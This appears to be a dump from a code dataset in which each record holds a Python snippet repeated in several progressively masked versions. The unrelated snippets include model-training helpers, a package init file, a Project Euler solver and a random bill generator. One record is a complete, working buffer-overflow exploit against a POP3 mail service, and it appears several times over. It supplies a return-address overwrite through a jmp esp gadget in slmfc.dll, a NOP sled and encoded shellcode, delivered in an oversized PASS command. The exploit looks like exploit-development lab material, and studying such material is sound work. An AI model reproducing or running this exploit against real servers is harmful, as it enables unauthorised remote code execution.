self.model\n \n \n X,y = 
df.iloc[:,:-1],df.iloc[:,-1]\n X_train,X_val,y_train,y_val = train_test_split(X,y,test_size = 0.3,random_state = 2020)\n \n model.fit(X_train,y_train)\n \n print('R square score on train set and test set are :',model.score(X_train,y_train),model.score(X_val,y_val))\n print('Root mean squared error on test set is :',np.sqrt(mean_squared_error(y_val,model.predict(X_val))))\n print('Mean absolute error on test set is :',mean_absolute_error(y_val,model.predict(X_val)))\n \n fimp = pd.DataFrame(zip(X.columns,model.coef_),columns = ['feat','coeff']).sort_values(by = 'coeff',ascending = False)\n fimp['abs_coeff'] = fimp['coeff'].apply(lambda x : x if x > 0 else -x)\n fimp['rel'] = fimp['coeff'].apply(lambda x : 'pos' if x > 0 else 'neg')\n fimp['rel'] = fimp['rel'].astype('category')\n fimp = fimp.sort_values(by = 'abs_coeff',ascending = False)\n \n pred = model.predict(X_val)\n diag = pd.DataFrame(zip(y_val,pred),columns = ['Ground Truth','Predicted'])\n \n full_name = './Models/'+filename+'.sav'\n joblib.dump(model, full_name)\n return fimp,diag\n\n def plot_feat_imp(self,fimp,title):\n '''\n Method inside the model_construction class, used for creating a feature importance plot\n \n Input :\n fimp : Dataframe with feature importance\n title : Title of the plot\n \n Displays a plot\n '''\n plt.figure(figsize = (18,12))\n sns.barplot(y = 'feat', x = 'abs_coeff', hue = 'rel',data = fimp)\n plt.title('Feature Importance plot for '+title)\n \n def plot_diagnostic(self,diag):\n '''\n Method inside the model_construction class, used for creating a diagnostic plot ground truth vs predicted\n \n Input :\n diag : Dataframe with feature importance\n \n Displays a plot\n '''\n \n plt.figure(figsize = (18,9))\n g = sns.scatterplot(x = 'Ground Truth', y = 'Predicted',data = diag)\n plt.title('Ground Truth vs Predicted on validation Data')\n plt.show()\n",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__all__ = ['MimicExplainer']
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from .mimic_explainer import MimicExplainer
__all__ = ['MimicExplainer']
<|reserved_special_token_1|>
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
"""Module for mimic explainer and explainable surrogate models."""
from .mimic_explainer import MimicExplainer
__all__ = ["MimicExplainer"]
|
flexible
|
{
"blob_id": "0b8cb522c531ac84d363b569a3ea4bfe47f61993",
"index": 5390,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n__all__ = ['MimicExplainer']\n",
"step-3": "<mask token>\nfrom .mimic_explainer import MimicExplainer\n__all__ = ['MimicExplainer']\n",
"step-4": "# ---------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# ---------------------------------------------------------\n\n\"\"\"Module for mimic explainer and explainable surrogate models.\"\"\"\nfrom .mimic_explainer import MimicExplainer\n\n__all__ = [\"MimicExplainer\"]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
"""
Consider all integer combinations of ab for 2 ≤ a ≤ 5 and 2 ≤ b ≤ 5:
22=4, 23=8, 24=16, 25=32
32=9, 33=27, 34=81, 35=243
42=16, 43=64, 44=256, 45=1024
52=25, 53=125, 54=625, 55=3125
If they are then placed in numerical order, with any repeats removed, we get the following sequence of 15 distinct terms:
4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125
How many distinct terms are in the sequence generated by ab for 2 ≤ a ≤ 100 and 2 ≤ b ≤ 100?
"""
import itertools
def euler_29(max_a, max_b):
gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(2, max_b + 1)))
return len(set(gen))
if __name__ == "__main__":
print(euler_29(100, 100))
|
normal
|
{
"blob_id": "c93bd042340a6e1d0124d8f6176bdf17ab56e405",
"index": 2229,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef euler_29(max_a, max_b):\n gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(\n 2, max_b + 1)))\n return len(set(gen))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef euler_29(max_a, max_b):\n gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(\n 2, max_b + 1)))\n return len(set(gen))\n\n\nif __name__ == '__main__':\n print(euler_29(100, 100))\n",
"step-4": "<mask token>\nimport itertools\n\n\ndef euler_29(max_a, max_b):\n gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(\n 2, max_b + 1)))\n return len(set(gen))\n\n\nif __name__ == '__main__':\n print(euler_29(100, 100))\n",
"step-5": "#!/usr/bin/env python\n\"\"\"\nConsider all integer combinations of ab for 2 ≤ a ≤ 5 and 2 ≤ b ≤ 5:\n\n 22=4, 23=8, 24=16, 25=32\n 32=9, 33=27, 34=81, 35=243\n 42=16, 43=64, 44=256, 45=1024\n 52=25, 53=125, 54=625, 55=3125\n\nIf they are then placed in numerical order, with any repeats removed, we get the following sequence of 15 distinct terms:\n\n4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125\n\nHow many distinct terms are in the sequence generated by ab for 2 ≤ a ≤ 100 and 2 ≤ b ≤ 100?\n\"\"\"\n\nimport itertools\n\ndef euler_29(max_a, max_b):\n gen = (a ** b for a, b in itertools.product(range(2, max_a + 1), range(2, max_b + 1)))\n return len(set(gen))\n\nif __name__ == \"__main__\":\n print(euler_29(100, 100))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(5):
arr.append(int(input()))
print(min(arr[0], arr[1], arr[2]) + min(arr[3], arr[4]) - 50)
<|reserved_special_token_1|>
arr = []
for i in range(5):
arr.append(int(input()))
print(min(arr[0], arr[1], arr[2]) + min(arr[3], arr[4]) - 50)
|
flexible
|
{
"blob_id": "8745855d86dcdabe55f8d1622b66b3613dbfe3e1",
"index": 4015,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(5):\n arr.append(int(input()))\nprint(min(arr[0], arr[1], arr[2]) + min(arr[3], arr[4]) - 50)\n",
"step-3": "arr = []\nfor i in range(5):\n arr.append(int(input()))\nprint(min(arr[0], arr[1], arr[2]) + min(arr[3], arr[4]) - 50)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/env python2
import socket
import struct
RHOST = "10.10.10.2"
RPORT = 110
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
# OFFSETS
# EIP 4654
# ESP 342
# EBP 4650
# jmp_esp in slmfc.dll at 5f4a358f
jmp_esp = 0x5f4a358f
nop_sled = "\x90" * 32
buf_totlen = 5000
offset_srp = 4654
shellcode_calc = b""
shellcode_calc += b"\xba\xd5\x90\xd2\x7d\xdb\xd5\xd9\x74\x24"
shellcode_calc += b"\xf4\x58\x31\xc9\xb1\x36\x31\x50\x13\x83"
shellcode_calc += b"\xe8\xfc\x03\x50\xda\x72\x27\x81\x0c\xf0"
shellcode_calc += b"\xc8\x7a\xcc\x95\x41\x9f\xfd\x95\x36\xeb"
shellcode_calc += b"\xad\x25\x3c\xb9\x41\xcd\x10\x2a\xd2\xa3"
shellcode_calc += b"\xbc\x5d\x53\x09\x9b\x50\x64\x22\xdf\xf3"
shellcode_calc += b"\xe6\x39\x0c\xd4\xd7\xf1\x41\x15\x10\xef"
shellcode_calc += b"\xa8\x47\xc9\x7b\x1e\x78\x7e\x31\xa3\xf3"
shellcode_calc += b"\xcc\xd7\xa3\xe0\x84\xd6\x82\xb6\x9f\x80"
shellcode_calc += b"\x04\x38\x4c\xb9\x0c\x22\x91\x84\xc7\xd9"
shellcode_calc += b"\x61\x72\xd6\x0b\xb8\x7b\x75\x72\x75\x8e"
shellcode_calc += b"\x87\xb2\xb1\x71\xf2\xca\xc2\x0c\x05\x09"
shellcode_calc += b"\xb9\xca\x80\x8a\x19\x98\x33\x77\x98\x4d"
shellcode_calc += b"\xa5\xfc\x96\x3a\xa1\x5b\xba\xbd\x66\xd0"
shellcode_calc += b"\xc6\x36\x89\x37\x4f\x0c\xae\x93\x14\xd6"
shellcode_calc += b"\xcf\x82\xf0\xb9\xf0\xd5\x5b\x65\x55\x9d"
shellcode_calc += b"\x71\x72\xe4\xfc\x1f\x85\x7a\x7b\x6d\x85"
shellcode_calc += b"\x84\x84\xc1\xee\xb5\x0f\x8e\x69\x4a\xda"
shellcode_calc += b"\xeb\x96\xa8\xcf\x01\x3f\x75\x9a\xa8\x22"
shellcode_calc += b"\x86\x70\xee\x5a\x05\x71\x8e\x98\x15\xf0"
shellcode_calc += b"\x8b\xe5\x91\xe8\xe1\x76\x74\x0f\x56\x76"
shellcode_calc += b"\x5d\x61\x3d\xfc\x7e\x0b\xce\x99\x0c\xd3"
shellcode_calc += b"\x1f\x03\x95\x77\x7f\xa5\x34\x13\x1a\x09"
shellcode_calc += b"\xd1\x82\x8f\x2c\x2f\x35\x2e\xdc\x3c\xb5"
buf = ""
buf += "A" * (offset_srp - len(buf))
buf += struct.pack("<I", jmp_esp)
buf += nop_sled
buf += shellcode_calc
buf += "D"*(buf_totlen - len(buf))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buf + '\r\n')
data = s.recv(1024)
s.close
|
normal
|
{
"blob_id": "280a4e1fb35937bb5a5c604f69337d30a4b956a9",
"index": 6302,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ns.connect((RHOST, RPORT))\n<mask token>\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\n<mask token>\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\n<mask token>\ns.send('USER username' + '\\r\\n')\n<mask token>\ns.send('PASS ' + buf + '\\r\\n')\n<mask token>\ns.close\n",
"step-3": "<mask token>\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-4": "import socket\nimport struct\nRHOST = '10.10.10.2'\nRPORT = 110\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\njmp_esp = 1598698895\nnop_sled = '\\x90' * 32\nbuf_totlen = 5000\noffset_srp = 4654\nshellcode_calc = b''\nshellcode_calc += b'\\xba\\xd5\\x90\\xd2}\\xdb\\xd5\\xd9t$'\nshellcode_calc += b'\\xf4X1\\xc9\\xb161P\\x13\\x83'\nshellcode_calc += b\"\\xe8\\xfc\\x03P\\xdar'\\x81\\x0c\\xf0\"\nshellcode_calc += b'\\xc8z\\xcc\\x95A\\x9f\\xfd\\x956\\xeb'\nshellcode_calc += b'\\xad%<\\xb9A\\xcd\\x10*\\xd2\\xa3'\nshellcode_calc += b'\\xbc]S\\t\\x9bPd\"\\xdf\\xf3'\nshellcode_calc += b'\\xe69\\x0c\\xd4\\xd7\\xf1A\\x15\\x10\\xef'\nshellcode_calc += b'\\xa8G\\xc9{\\x1ex~1\\xa3\\xf3'\nshellcode_calc += b'\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80'\nshellcode_calc += b'\\x048L\\xb9\\x0c\"\\x91\\x84\\xc7\\xd9'\nshellcode_calc += b'ar\\xd6\\x0b\\xb8{uru\\x8e'\nshellcode_calc += b'\\x87\\xb2\\xb1q\\xf2\\xca\\xc2\\x0c\\x05\\t'\nshellcode_calc += b'\\xb9\\xca\\x80\\x8a\\x19\\x983w\\x98M'\nshellcode_calc += b'\\xa5\\xfc\\x96:\\xa1[\\xba\\xbdf\\xd0'\nshellcode_calc += b'\\xc66\\x897O\\x0c\\xae\\x93\\x14\\xd6'\nshellcode_calc += b'\\xcf\\x82\\xf0\\xb9\\xf0\\xd5[eU\\x9d'\nshellcode_calc += b'qr\\xe4\\xfc\\x1f\\x85z{m\\x85'\nshellcode_calc += b'\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8eiJ\\xda'\nshellcode_calc += b'\\xeb\\x96\\xa8\\xcf\\x01?u\\x9a\\xa8\"'\nshellcode_calc += b'\\x86p\\xeeZ\\x05q\\x8e\\x98\\x15\\xf0'\nshellcode_calc += b'\\x8b\\xe5\\x91\\xe8\\xe1vt\\x0fVv'\nshellcode_calc += b']a=\\xfc~\\x0b\\xce\\x99\\x0c\\xd3'\nshellcode_calc += b'\\x1f\\x03\\x95w\\x7f\\xa54\\x13\\x1a\\t'\nshellcode_calc += b'\\xd1\\x82\\x8f,/5.\\xdc<\\xb5'\nbuf = ''\nbuf += 'A' * (offset_srp - len(buf))\nbuf += struct.pack('<I', jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += 'D' * (buf_totlen - len(buf))\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = 
s.recv(1024)\ns.close\n",
"step-5": "#!/usr/bin/env python2\n\nimport socket\nimport struct\n\nRHOST = \"10.10.10.2\"\nRPORT = 110\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((RHOST, RPORT))\n\n# OFFSETS\n# EIP 4654\n# ESP 342\n# EBP 4650\n# jmp_esp in slmfc.dll at 5f4a358f\njmp_esp = 0x5f4a358f\nnop_sled = \"\\x90\" * 32\n\nbuf_totlen = 5000\noffset_srp = 4654\n\nshellcode_calc = b\"\"\nshellcode_calc += b\"\\xba\\xd5\\x90\\xd2\\x7d\\xdb\\xd5\\xd9\\x74\\x24\"\nshellcode_calc += b\"\\xf4\\x58\\x31\\xc9\\xb1\\x36\\x31\\x50\\x13\\x83\"\nshellcode_calc += b\"\\xe8\\xfc\\x03\\x50\\xda\\x72\\x27\\x81\\x0c\\xf0\"\nshellcode_calc += b\"\\xc8\\x7a\\xcc\\x95\\x41\\x9f\\xfd\\x95\\x36\\xeb\"\nshellcode_calc += b\"\\xad\\x25\\x3c\\xb9\\x41\\xcd\\x10\\x2a\\xd2\\xa3\"\nshellcode_calc += b\"\\xbc\\x5d\\x53\\x09\\x9b\\x50\\x64\\x22\\xdf\\xf3\"\nshellcode_calc += b\"\\xe6\\x39\\x0c\\xd4\\xd7\\xf1\\x41\\x15\\x10\\xef\"\nshellcode_calc += b\"\\xa8\\x47\\xc9\\x7b\\x1e\\x78\\x7e\\x31\\xa3\\xf3\"\nshellcode_calc += b\"\\xcc\\xd7\\xa3\\xe0\\x84\\xd6\\x82\\xb6\\x9f\\x80\"\nshellcode_calc += b\"\\x04\\x38\\x4c\\xb9\\x0c\\x22\\x91\\x84\\xc7\\xd9\"\nshellcode_calc += b\"\\x61\\x72\\xd6\\x0b\\xb8\\x7b\\x75\\x72\\x75\\x8e\"\nshellcode_calc += b\"\\x87\\xb2\\xb1\\x71\\xf2\\xca\\xc2\\x0c\\x05\\x09\"\nshellcode_calc += b\"\\xb9\\xca\\x80\\x8a\\x19\\x98\\x33\\x77\\x98\\x4d\"\nshellcode_calc += b\"\\xa5\\xfc\\x96\\x3a\\xa1\\x5b\\xba\\xbd\\x66\\xd0\"\nshellcode_calc += b\"\\xc6\\x36\\x89\\x37\\x4f\\x0c\\xae\\x93\\x14\\xd6\"\nshellcode_calc += b\"\\xcf\\x82\\xf0\\xb9\\xf0\\xd5\\x5b\\x65\\x55\\x9d\"\nshellcode_calc += b\"\\x71\\x72\\xe4\\xfc\\x1f\\x85\\x7a\\x7b\\x6d\\x85\"\nshellcode_calc += b\"\\x84\\x84\\xc1\\xee\\xb5\\x0f\\x8e\\x69\\x4a\\xda\"\nshellcode_calc += b\"\\xeb\\x96\\xa8\\xcf\\x01\\x3f\\x75\\x9a\\xa8\\x22\"\nshellcode_calc += b\"\\x86\\x70\\xee\\x5a\\x05\\x71\\x8e\\x98\\x15\\xf0\"\nshellcode_calc += b\"\\x8b\\xe5\\x91\\xe8\\xe1\\x76\\x74\\x0f\\x56\\x76\"\nshellcode_calc += 
b\"\\x5d\\x61\\x3d\\xfc\\x7e\\x0b\\xce\\x99\\x0c\\xd3\"\nshellcode_calc += b\"\\x1f\\x03\\x95\\x77\\x7f\\xa5\\x34\\x13\\x1a\\x09\"\nshellcode_calc += b\"\\xd1\\x82\\x8f\\x2c\\x2f\\x35\\x2e\\xdc\\x3c\\xb5\"\n\nbuf = \"\"\nbuf += \"A\" * (offset_srp - len(buf))\nbuf += struct.pack(\"<I\", jmp_esp)\nbuf += nop_sled\nbuf += shellcode_calc\nbuf += \"D\"*(buf_totlen - len(buf))\n\ndata = s.recv(1024)\ns.send('USER username' + '\\r\\n')\ndata = s.recv(1024)\ns.send('PASS ' + buf + '\\r\\n')\ndata = s.recv(1024)\ns.close\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
l_store_id = random.randint(1, 4)
now = datetime.datetime.now()
l_bill_id = now.strftime('%Y%m%d%H%M%S')
start_date = datetime.date(2000, 1, 1)
end_date = datetime.date(2020, 1, 1)
time_between_dates = end_date - start_date
days_between_dates = time_between_dates.days
random_number_of_days = random.randrange(days_between_dates)
l_date = start_date + datetime.timedelta(days=random_number_of_days)
l_bill_details = {}
for i in range(random.randint(1, 25)):
l_prod_id = random.randint(1, 25)
l_qty = random.randint(1, 20)
l_bill_details[l_prod_id] = l_qty
l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':
l_date, 'bill_details': l_bill_details}
print(l_data)
new_file = open(l_target_path + l_bill_id + '.json', 'w')
new_file.write(str(l_data))
new_file.close()
time.sleep(3)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
l_target_path = 'E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/'
while True:
l_store_id = random.randint(1, 4)
now = datetime.datetime.now()
l_bill_id = now.strftime('%Y%m%d%H%M%S')
start_date = datetime.date(2000, 1, 1)
end_date = datetime.date(2020, 1, 1)
time_between_dates = end_date - start_date
days_between_dates = time_between_dates.days
random_number_of_days = random.randrange(days_between_dates)
l_date = start_date + datetime.timedelta(days=random_number_of_days)
l_bill_details = {}
for i in range(random.randint(1, 25)):
l_prod_id = random.randint(1, 25)
l_qty = random.randint(1, 20)
l_bill_details[l_prod_id] = l_qty
l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':
l_date, 'bill_details': l_bill_details}
print(l_data)
new_file = open(l_target_path + l_bill_id + '.json', 'w')
new_file.write(str(l_data))
new_file.close()
time.sleep(3)
<|reserved_special_token_1|>
import random
import datetime
import os
import time
import json
l_target_path = 'E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/'
while True:
l_store_id = random.randint(1, 4)
now = datetime.datetime.now()
l_bill_id = now.strftime('%Y%m%d%H%M%S')
start_date = datetime.date(2000, 1, 1)
end_date = datetime.date(2020, 1, 1)
time_between_dates = end_date - start_date
days_between_dates = time_between_dates.days
random_number_of_days = random.randrange(days_between_dates)
l_date = start_date + datetime.timedelta(days=random_number_of_days)
l_bill_details = {}
for i in range(random.randint(1, 25)):
l_prod_id = random.randint(1, 25)
l_qty = random.randint(1, 20)
l_bill_details[l_prod_id] = l_qty
l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':
l_date, 'bill_details': l_bill_details}
print(l_data)
new_file = open(l_target_path + l_bill_id + '.json', 'w')
new_file.write(str(l_data))
new_file.close()
time.sleep(3)
<|reserved_special_token_1|>
import random
import datetime
import os
import time
import json
#
l_target_path = "E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/"
while True:
l_store_id = random.randint(1, 4)
now = datetime.datetime.now()
l_bill_id = now.strftime("%Y%m%d%H%M%S")
# Generate Random Date
start_date = datetime.date(2000, 1, 1)
end_date = datetime.date(2020, 1, 1)
time_between_dates = end_date - start_date
days_between_dates = time_between_dates.days
random_number_of_days = random.randrange(days_between_dates)
l_date = start_date + datetime.timedelta(days=random_number_of_days)
l_bill_details = {}
for i in range(random.randint(1, 25)):
l_prod_id = random.randint(1,25)
l_qty = random.randint(1,20)
l_bill_details[l_prod_id] = l_qty
l_data = { "bill_id":l_bill_id
,"store_id":l_store_id
,"bill_date":l_date
,"bill_details":l_bill_details}
print(l_data) #json.dumps(l_data)
new_file = open(l_target_path + l_bill_id + ".json", "w")
new_file.write(str(l_data))
new_file.close()
time.sleep(3)
|
flexible
|
{
"blob_id": "fad2ad89e4d0f04fad61e27048397a5702870ca9",
"index": 6177,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n l_store_id = random.randint(1, 4)\n now = datetime.datetime.now()\n l_bill_id = now.strftime('%Y%m%d%H%M%S')\n start_date = datetime.date(2000, 1, 1)\n end_date = datetime.date(2020, 1, 1)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n l_date = start_date + datetime.timedelta(days=random_number_of_days)\n l_bill_details = {}\n for i in range(random.randint(1, 25)):\n l_prod_id = random.randint(1, 25)\n l_qty = random.randint(1, 20)\n l_bill_details[l_prod_id] = l_qty\n l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':\n l_date, 'bill_details': l_bill_details}\n print(l_data)\n new_file = open(l_target_path + l_bill_id + '.json', 'w')\n new_file.write(str(l_data))\n new_file.close()\n time.sleep(3)\n",
"step-3": "<mask token>\nl_target_path = 'E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/'\nwhile True:\n l_store_id = random.randint(1, 4)\n now = datetime.datetime.now()\n l_bill_id = now.strftime('%Y%m%d%H%M%S')\n start_date = datetime.date(2000, 1, 1)\n end_date = datetime.date(2020, 1, 1)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n l_date = start_date + datetime.timedelta(days=random_number_of_days)\n l_bill_details = {}\n for i in range(random.randint(1, 25)):\n l_prod_id = random.randint(1, 25)\n l_qty = random.randint(1, 20)\n l_bill_details[l_prod_id] = l_qty\n l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':\n l_date, 'bill_details': l_bill_details}\n print(l_data)\n new_file = open(l_target_path + l_bill_id + '.json', 'w')\n new_file.write(str(l_data))\n new_file.close()\n time.sleep(3)\n",
"step-4": "import random\nimport datetime\nimport os\nimport time\nimport json\nl_target_path = 'E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/'\nwhile True:\n l_store_id = random.randint(1, 4)\n now = datetime.datetime.now()\n l_bill_id = now.strftime('%Y%m%d%H%M%S')\n start_date = datetime.date(2000, 1, 1)\n end_date = datetime.date(2020, 1, 1)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n l_date = start_date + datetime.timedelta(days=random_number_of_days)\n l_bill_details = {}\n for i in range(random.randint(1, 25)):\n l_prod_id = random.randint(1, 25)\n l_qty = random.randint(1, 20)\n l_bill_details[l_prod_id] = l_qty\n l_data = {'bill_id': l_bill_id, 'store_id': l_store_id, 'bill_date':\n l_date, 'bill_details': l_bill_details}\n print(l_data)\n new_file = open(l_target_path + l_bill_id + '.json', 'w')\n new_file.write(str(l_data))\n new_file.close()\n time.sleep(3)\n",
"step-5": "import random\nimport datetime\nimport os\nimport time\nimport json\n\n#\nl_target_path = \"E:/code/PYTHON_TRAINING/Training/Apr2020/BillingSystem/bills/\"\n\n\nwhile True:\n\n l_store_id = random.randint(1, 4)\n now = datetime.datetime.now()\n l_bill_id = now.strftime(\"%Y%m%d%H%M%S\")\n\n\n # Generate Random Date\n start_date = datetime.date(2000, 1, 1)\n end_date = datetime.date(2020, 1, 1)\n time_between_dates = end_date - start_date\n days_between_dates = time_between_dates.days\n random_number_of_days = random.randrange(days_between_dates)\n\n l_date = start_date + datetime.timedelta(days=random_number_of_days)\n\n l_bill_details = {}\n\n for i in range(random.randint(1, 25)):\n\n l_prod_id = random.randint(1,25)\n l_qty = random.randint(1,20)\n l_bill_details[l_prod_id] = l_qty\n\n l_data = { \"bill_id\":l_bill_id\n ,\"store_id\":l_store_id\n ,\"bill_date\":l_date\n ,\"bill_details\":l_bill_details}\n \n print(l_data) #json.dumps(l_data)\n\n new_file = open(l_target_path + l_bill_id + \".json\", \"w\")\n new_file.write(str(l_data))\n new_file.close()\n\n\n time.sleep(3)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Area(Resource):
<|reserved_special_token_0|>
